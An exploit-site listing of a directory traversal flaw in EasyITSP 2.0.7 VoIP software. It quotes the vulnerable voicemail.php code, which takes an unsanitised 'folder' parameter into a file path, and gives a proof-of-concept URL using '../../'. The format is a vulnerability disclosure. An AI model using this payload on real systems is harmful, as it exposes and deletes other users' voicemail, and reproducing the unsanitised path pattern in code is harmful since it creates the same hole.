Lucene search

K
zdtMichal Blaszczak1337DAY-ID-20289
HistoryFeb 05, 2013 - 12:00 a.m.

EasyITSP 2.0.7 Directory Traversal Vulnerability

2013-02-0500:00:00
Michal Blaszczak
0day.today
11

EasyITSP versions 2.0.7 and below suffer from a directory traversal vulnerability.

Directory Traversal - EasyITSP <= 2.0.7

EasyITSP - Telephone System VoIP

http://blaszczakm.blogspot.com
Michal Blaszczak

Search/Read/Delete filetype *.txt
Search/Play/Delete filetype *.wav - Voicemail

file: voicemail.php line: 220

foreach (glob("$vmdir/$_SESSION[phone]/$vmfolder/*.txt") as $filename) {

file: voicemail.php line: 186 - 190

if(isset($_GET['folder'])) {
$vmfolder = $_GET['folder'];
} else {
$vmfolder = "INBOX";
}

POC:
http:///easyitsp/WEB/customer/voicemail.php?currentpage=phones&folder=../../

Michał Błaszczak
http://blaszczakm.blogspot.com

#  0day.today [2018-01-03]  #